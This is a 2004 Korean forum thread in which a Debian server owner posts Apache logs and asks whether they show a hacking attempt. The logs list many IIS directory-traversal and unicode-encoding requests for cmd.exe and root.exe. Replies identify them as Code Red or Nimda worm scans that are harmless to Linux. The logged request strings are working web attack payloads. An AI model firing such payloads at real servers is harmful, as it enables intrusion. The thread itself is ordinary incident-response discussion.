해킹 시도?
글쓴이: lacovnk / 작성시간: 월, 2004/01/19 - 11:37오전
error.log에는 다음과 같고..
Quote:
[Sun Jan 18 06:25:23 2004] [notice] suEXEC mechanism enabled (wrapper: /usr/lib/apache/suexec)
4 [Sun Jan 18 06:25:23 2004] [notice] Accept mutex: sysvsem (Default: sysvsem)
5 [Sun Jan 18 14:34:25 2004] [error] [client 220.78.158.52] File does not exist: /var/www/scripts/root.exe
6 [Sun Jan 18 14:34:25 2004] [error] [client 220.78.158.52] File does not exist: /var/www/MSADC/root.exe
7 [Sun Jan 18 14:34:25 2004] [error] [client 220.78.158.52] File does not exist: /var/www/c/winnt/system32/cmd.exe
8 [Sun Jan 18 14:34:25 2004] [error] [client 220.78.158.52] File does not exist: /var/www/d/winnt/system32/cmd.exe
9 [Sun Jan 18 14:34:25 2004] [error] [client 220.78.158.52] File does not exist: /var/www/scripts/..%5c../winnt/system32/cmd.exe
10 [Sun Jan 18 14:34:25 2004] [error] [client 220.78.158.52] File does not exist: /var/www/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
11 [Sun Jan 18 14:34:25 2004] [error] [client 220.78.158.52] File does not exist: /var/www/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
12 [Sun Jan 18 14:34:25 2004] [error] [client 220.78.158.52] File does not exist: /var/www/msadc/..%5c../..%5c../..%5c/..?\../..?\../..?\../winnt/syst em32/cmd.exe
13 [Sun Jan 18 14:34:25 2004] [error] [client 220.78.158.52] File does not exist: /var/www/scripts/..?\../winnt/system32/cmd.exe
14 [Sun Jan 18 14:34:26 2004] [error] [client 220.78.158.52] File does not exist: /var/www/scripts/..유../winnt/system32/cmd.exe
15 [Sun Jan 18 14:34:26 2004] [error] [client 220.78.158.52] File does not exist: /var/www/scripts/..?\../winnt/system32/cmd.exe
16 [Sun Jan 18 14:34:26 2004] [error] [client 220.78.158.52] File does not exist: /var/www/scripts/..%5c../winnt/system32/cmd.exe
17 [Sun Jan 18 14:34:26 2004] [error] [client 220.78.158.52] File does not exist: /var/www/scripts/..%2f../winnt/system32/cmd.exe
18 [Sun Jan 18 19:23:01 2004] [error] [client 220.90.137.45] File does not exist: /var/www/default.ida
19 [Sun Jan 18 21:04:13 2004] [error] [client 220.85.126.4] File does not exist: /var/www/scripts/root.exe
20 [Sun Jan 18 21:04:13 2004] [error] [client 220.85.126.4] File does not exist: /var/www/MSADC/root.exe
21 [Sun Jan 18 21:04:13 2004] [error] [client 220.85.126.4] File does not exist: /var/www/c/winnt/system32/cmd.exe
22 [Sun Jan 18 21:04:13 2004] [error] [client 220.85.126.4] File does not exist: /var/www/d/winnt/system32/cmd.exe
23 [Sun Jan 18 21:04:13 2004] [error] [client 220.85.126.4] File does not exist: /var/www/scripts/..%5c../winnt/system32/cmd.exe
24 [Sun Jan 18 21:04:13 2004] [error] [client 220.85.126.4] File does not exist: /var/www/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
25 [Sun Jan 18 21:04:13 2004] [error] [client 220.85.126.4] File does not exist: /var/www/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
26 [Sun Jan 18 21:04:13 2004] [error] [client 220.85.126.4] File does not exist: /var/www/msadc/..%5c../..%5c../..%5c/..?\../..?\../..?\../winnt/syste m32/cmd.exe
27 [Sun Jan 18 21:04:13 2004] [error] [client 220.85.126.4] File does not exist: /var/www/scripts/..?\../winnt/system32/cmd.exe
28 [Sun Jan 18 21:04:13 2004] [error] [client 220.85.126.4] File does not exist: /var/www/scripts/..유../winnt/system32/cmd.exe
29 [Sun Jan 18 21:04:14 2004] [error] [client 220.85.126.4] File does not exist: /var/www/scripts/..?\../winnt/system32/cmd.exe
30 [Sun Jan 18 21:04:14 2004] [error] [client 220.85.126.4] File does not exist: /var/www/scripts/..%5c../winnt/system32/cmd.exe
31 [Sun Jan 18 21:04:14 2004] [error] [client 220.85.126.4] File does not exist: /var/www/scripts/..%2f../winnt/system32/cmd.exe
놀라서 access.log를 뒤져보니..
Quote:
220.85.126.4 - - [18/Jan/2004:21:04:13 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 282 "-" "-"
1338 220.85.126.4 - - [18/Jan/2004:21:04:13 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 280 "-" "-"
1339 220.85.126.4 - - [18/Jan/2004:21:04:13 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
1340 220.85.126.4 - - [18/Jan/2004:21:04:13 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
1341 220.85.126.4 - - [18/Jan/2004:21:04:13 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
1342 220.85.126.4 - - [18/Jan/2004:21:04:13 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-"
1343 220.85.126.4 - - [18/Jan/2004:21:04:13 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-"
1344 220.85.126.4 - - [18/Jan/2004:21:04:13 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir H TTP/1.0" 404 337 "-" "-"
1345 220.85.126.4 - - [18/Jan/2004:21:04:13 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
1346 220.85.126.4 - - [18/Jan/2004:21:04:13 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
1347 220.85.126.4 - - [18/Jan/2004:21:04:13 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
1348 220.85.126.4 - - [18/Jan/2004:21:04:14 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
1349 220.85.126.4 - - [18/Jan/2004:21:04:14 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287 "-" "-"
1350 220.85.126.4 - - [18/Jan/2004:21:04:14 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287 "-" "-"
1351 220.85.126.4 - - [18/Jan/2004:21:04:14 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
1352 220.85.126.4 - - [18/Jan/2004:21:04:14 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
대충보니, 파일 올리고 악성 스크립트를 실행시키려고 했던 것 같은데 -_-; 무섭군요 -_-;;
윈도우 서버에만 해당되는 방법이려나? (cmd.exe를 찾는 것 보아하니..-_-; )
데비안인데, 계속 패키지 업데이트 하고, portsentry와 chkrootkit 써서 확인하고 그정도인데..으음. 더 해줘야 할 게 뭐가 있으려나..-_-;
chkroot로 돌려보니 모두 not infected인데, 아닌 것은 다음과 같네요.
Quote:
Checking `bindshell'... INFECTED (PORTS: 1524 31337)
아아~ 괜히 불안하네요 :) 뭐 제 개인 서버라 제것만 날라가니 다행이긴 합니다만 -_-;
Forums:
감염된 컴퓨터가 자동으로 공격하는 것일 확률이 99%
Nimda 인가 codered인가 그거에 감염된 윈도우계열의 컴퓨터가
지랄발광하는 것 같네요
로그에 그것이 남지 않도록 하거나 또는
그 아이피 대역을 막아 버리면 되지 않나요?
국민여러분! 행복하십니까? 살림좀 나아졌습니까?
즐넷...^_^
그렇겠군요 :)
아무래도 윈도우 계열의 컴퓨터가 자동 공격하는 거겠네요 :(
그런데 보아하니 유동아이피 같아서 확 막아버리기도 어렵고..으음.
그런데 마지막에 나온 INFECTED는 무어죠? ㅠㅠ
Code Red II 웜으로 추측.
http://www.certcc.or.kr/paper/incident_note/2001/in2001_010.html
여기에 나온 증상 같군요 :)
그리고 bindshell이 INFECTED로 나온 것은 portsentry 사용때문이더군요 ^^;
http://debianusers.org/jsboard/read.php?table=qna&no=5079&page=1&o[sc]=a&o[ss]=chkroot&o[st]=a&o[at]=s&o[sct]=s&o[stt]=s
저거 코드레드걸린 피씨에서 접근시도하는거예요..80포트만 열려있으
저거 코드레드걸린 피씨에서 접근시도하는거예요..
80포트만 열려있으면 다 시도해보는거 같더라구요..
원래 iis 구멍을 이용하는거니까, 리눅스에는 씨알도 안먹히는거니까 걱정할 필요는 없구요, 로그때문에 문제라면 http://tunelinux.pe.kr/bbs/read.php?table=linuxinfo&no=105 문서를 참조해서 httpd.conf를 수정하면 됩니다.
^^;;
댓글 달기